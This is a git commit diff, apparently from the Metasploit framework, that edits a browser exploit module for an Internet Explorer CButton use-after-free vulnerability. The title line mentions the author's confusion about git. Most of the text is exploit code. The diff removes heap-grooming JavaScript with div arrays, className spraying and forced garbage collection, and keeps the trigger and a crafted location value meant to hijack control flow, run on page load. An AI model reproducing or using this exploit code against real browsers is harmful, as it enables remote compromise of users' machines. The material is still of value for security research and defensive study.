Your def of commit apparently is a little different than mine, git.

bug/bundler_fix 2013010202
sinn3r 2012-12-31 00:35:13 -06:00
parent 2b3f7c4430
commit f7543e18fe
1 changed files with 3 additions and 34 deletions

View File

@ -15,7 +15,7 @@ class Metasploit3 < Msf::Exploit::Remote
def initialize(info={})
super(update_info(info,
'Name' => "Microsoft Internet Explorer CDwnBindInfo Object Use-After-Free Vulnerability",
'Name' => "Microsoft Internet Explorer CButton Object Use-After-Free Vulnerability",
'Description' => %q{
This module exploits a vulnerability found in Microsoft Internet Explorer. A
use-after-free condition occurs when a CButton object is freed, but a reference
@ -187,37 +187,11 @@ Stack Pivoting to eax:
<script>
#{js}
function exploit()
function helloWorld()
{
var e0 = null;
var e1 = null;
var e2 = null;
var arrObject = new Array(3000);
var elmObject = new Array(500);
for (var i = 0; i < arrObject.length; i++)
{
arrObject[i] = document.createElement('div');
arrObject[i].className = unescape("ababababababababababababababababababababa");
}
for (var i = 0; i < arrObject.length; i += 2)
{
arrObject[i].className = null;
}
CollectGarbage();
for (var i = 0; i < elmObject.length; i ++)
{
elmObject[i] = document.createElement('button');
}
for (var i = 1; i < arrObject.length; i += 2)
{
arrObject[i].className = null;
}
CollectGarbage();
try {
e0 = document.getElementById("a");
@ -230,19 +204,14 @@ Stack Pivoting to eax:
e2.appendChild(document.createElement('body'));
} catch(e) { }
CollectGarbage();
for(var i =0; i < 20; i++)
{
arrObject[i].className = unescape("ababababababababababababababababababababa");
}
var eip = window;
var data = "#{Rex::Text.rand_text_alpha(41)}";
eip.location = unescape("%u0b30%u0c0c" + data);
}
</script>
</head>
<body onload="eval(exploit())">
<body onload="eval(helloWorld())">
<form id="a">
</form>
<dfn id="b">